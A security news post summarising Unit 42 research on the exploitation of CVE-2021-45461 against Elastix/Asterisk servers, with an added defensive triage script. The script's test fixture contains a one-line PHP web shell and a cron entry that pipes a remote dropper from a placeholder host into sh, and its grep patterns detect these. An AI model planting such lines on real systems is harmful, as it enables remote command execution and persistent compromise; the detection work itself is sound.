TheCyberThrone

Digium Phone Flaws


Researchers have brought to light a campaign targeting the Elastix system used with Digium phones.

The flaw, tracked as CVE-2021-45461 with a CVSS score of 9.8, is a remote code execution bug in the Rest Phone Apps (restapps) module and was exploited to implant a web shell on VoIP servers. The attackers then used the web shell to exfiltrate data and to drop additional payloads onto the target's Digium phone software.


A high volume of malicious traffic, likely originating from more than 500,000 unique malware samples, was observed between mid-December 2021 and the end of March 2022. The traffic targeted Digium's open-source Asterisk communication software, which powers VoIP phone systems.

The attack chain starts with a dropper shell script retrieved from a remote server, which in turn downloads an obfuscated PHP backdoor and writes it to multiple locations on the file system.

The PHP backdoor also creates several root user accounts and sets up a scheduled task to maintain persistence and re-infect the host.

The malware accepts arbitrary commands through the cmd request parameter and ships with built-in default commands that let its operators carry out further malicious activity on the compromised server.
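The three traits just described (a PHP web shell that takes its command from a request parameter, extra UID-0 accounts, and a cron job that re-fetches the dropper) are all things a responder can hunt for on a live Elastix/FreePBX host. The script below is an added triage example, not code from the original post or from Palo Alto Networks; it assumes the parameter is read as `$_REQUEST`/`$_GET`/`$_POST['cmd']` and that persistence is a cron line piping curl or wget into a shell, and it runs against a constructed fixture so it can be tried offline before pointing it at `/etc/passwd`, the web root and `/etc/cron.d`.

```shell
#!/bin/sh
# Added triage helper (not from the original post or Unit 42). It checks a host
# for the three traits the write-up describes. Assumptions not stated on the
# page: the backdoor reads a `cmd` request parameter, and persistence is a
# cron entry that re-downloads the dropper and pipes it into a shell.
set -u

# 1. Extra UID-0 accounts ("creates several root user accounts"):
#    print every UID-0 login other than "root" in the given passwd file.
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# 2. Web shell candidates: PHP files under a web root that take a command
#    from the (assumed) `cmd` request parameter, or unwrap base64 into eval().
#    The "." on either side of cmd matches single or double quotes.
webshell_candidates() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        -e '\$_(REQUEST|GET|POST)\[.cmd.\]' \
        -e 'eval\(base64_decode\(' {} + 2>/dev/null | sort
}

# 3. Cron entries that fetch remote content and execute it, which is the
#    re-infection mechanism described. Comments and blank lines are skipped.
suspicious_cron_entries() {
    cat "$@" 2>/dev/null \
        | grep -vE '^[[:space:]]*(#|$)' \
        | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' || :
}

# Constructed fixture (not real IoCs): a passwd with a second UID-0 login,
# a web root with one clean page and one hidden shell, and a cron.d file
# with one benign job and one that pipes a remote script into sh.
make_fixture() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/www/rest" "$d/cron.d"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin' \
        'backup_svc:x:0:0::/root:/bin/bash' > "$d/passwd"
    cat > "$d/www/rest/index.php" <<'EOF'
<?php echo "ok"; ?>
EOF
    cat > "$d/www/rest/.cache.php" <<'EOF'
<?php @system($_REQUEST['cmd']); ?>
EOF
    printf '%s\n' \
        '# constructed sample cron file' \
        '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' \
        '*/10 * * * * root curl -s http://example.invalid/dropper.sh | sh' \
        > "$d/cron.d/sysupdate"
    printf '%s\n' "$d"
}

# Demo run on the fixture. On a real host use /etc/passwd, the Elastix
# web root (e.g. /var/www/html) and /etc/cron.d plus /var/spool/cron.
FIXTURE=$(make_fixture)
echo "== extra UID-0 accounts =="
extra_root_accounts "$FIXTURE/passwd"
echo "== web shell candidates =="
webshell_candidates "$FIXTURE/www"
echo "== cron entries fetching remote code =="
suspicious_cron_entries "$FIXTURE"/cron.d/*
rm -rf "$FIXTURE"
```

The grep patterns are deliberately narrow so the script stays quiet on a clean host; a backdoor that obfuscates the parameter name or its decoder will not match, so treat a hit as a lead to confirm by hand and an empty result as no proof of absence. Run it with real paths from a read-only mount or a forensic image where possible, since the backdoor re-installs itself from cron.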


This research was conducted and documented by researchers from Palo Alto Networks (Unit 42).

Indicators of Compromise

Original Shell Scripts – SHA256 hashes

Local Filepaths
